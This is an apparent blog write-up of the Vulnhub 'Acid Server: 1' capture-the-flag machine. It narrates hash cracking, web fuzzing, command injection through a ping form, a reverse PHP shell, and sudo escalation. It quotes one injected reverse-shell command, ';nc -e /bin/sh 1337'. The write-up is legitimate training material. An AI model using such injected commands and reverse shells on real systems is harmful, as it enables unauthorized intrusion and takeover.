Acid … just say NO to drugs!

If you follow @Vulnhub you would have noticed that there has recently been quite a few new vulnerable boot2root machines released. Needless to say, you know what time it is… It’s boot2root CTF time!

Introducing Acid Server: 1 by @m_avinash143.

Welcome to the world of Acid.

Fairy tails uses secret keys to open the magical doors.

Goal: Escalate the privileges to root and capture the flag. Once anyone able to beat the machine then please let me know.

In my previous write-ups you would have noticed I always start out by running netdiscover to find the IP address of the challenge host. Well, I’m starting to get lazy so now I give all my challenge machines the same MAC address and DHCP lease…. “Save the planet; don’t waste white space”. ;)

Let’s find what ports are open or listening:

Okay… http open at port 33447. Time to take a look in a browser:


Secret keys and fairy tails (tales sp?).. sounds cool. Viewing the source has an interesting comment on line 76: 0x643239334c6d70775a773d3d

Looks like hex to me, which, once converted then looks like it’s base64 encoded. Let’s decode both:

If you look at the source code you will notice that images are stored in /images/. Let’s see if our wow.jpg gives us any clues:


Nothing overly exciting. Let’s grab the image and run strings over it.

A couple of things to take note of… Firstly, the image is not a jpg, it is a gif. Secondly, the last line looks like it could be some hex.

Let’s use hash-identifier to work out what hash we are playing with:

And last but not least, we’ll push the MD5 hash through hashcat:

63425 means nothing to me at the moment, so let’s just move on. Did you notice the title of the default webpage? /Challenge. Let’s try it before we start fuzzing the webserver.


We’re greeted with a page welcoming us to hell; how nice. After spending a bit of time trying usual credentials and attempting SQL injection, I decided to fuzz the webserver:

cake.php doesn’t help us out too much, but it does have an interesting title; /Magic_Box:


Browsing the /Challenge/Magic_Box path gives us a permission denied warning, so there may be something interesting around… let’s try fuzzing it:

Let’s take a look at command.php:


Ohhhh… enter a host to ping you say? Is anyone else thinking remote command execution? Let’s intercept the POST and response in burpsuite and see what we get:



Nice! Possible command execution right there. Let’s give it a try:

Well hello www-data! At this point I tried the obvious next step, a reverse shell… ;nc -e /bin/sh 1337; no joy unfortunately.

I then tried to use wget to grab a php shell from my server; again.. no luck. I then thought about echo’ing out a php one liner to create simple php script; again.. no luck.

Hmm… perhaps I don’t have the correct permissions to write as the www-data user. A quick ls -al of my current location showed that I can write one directory down. Let’s try the php one liner again. :)

Seems okay. Let’s test it:

BAM! We have a command shell. Let’s do it properly this time and put a reverse PHP shell on the server:

Execute the new phpshell.php and it’s reverse shell time:

Time to enumerate the host. I checked for the usual suid binaries, world writeable files and directories, log files, etc etc etc. /etc/passwd contained the following users of interest, however permissions stop me from finding anything useful.

It was almost time to be lazy and use one of the automated linux privilege check scripts, until I saw it…. /s.bin … that’s not part of a normal tree. Taking a look at the contents reveals one single php file:

A taunt… I continue to rummage around the system looking for clues or anything else odd. Getting even closer to running an automated script, I come across a recently modified directory in /sbin, which once again isn’t a directory I have noticed before.

… and upon closer inspection we find a capture file.

A quick symlink to our writeable web directory and we can take a look at the capture file on our attacking machine.

Using strings, we come across something interesting…..

Taking a look at the capture file with tcpdump we find that the string comes from a conversation over port 1337. Let’s use tcpick to find all 1337 traffic and to tidy up the output:

According to the conversation, our culprit is saman, who we know has a user account on acid. Could his alias of 1337hax0r also be his password?

Yes.. yes it could. Does saman have any sudo privileges?

Yes.. he certainly does. Root.. here we come!

… and it’s time to raise the flag!

THE END. Acid was fun, but remember kids…. “Just say no to drugs”.

Thanks for the Acid Server: 1 boot2root @m_avinash143.

Thank you like always @Vulnhub and @g0tmi1k for hosting such awesome challenges.

Until next time, tight lines and happy hacking.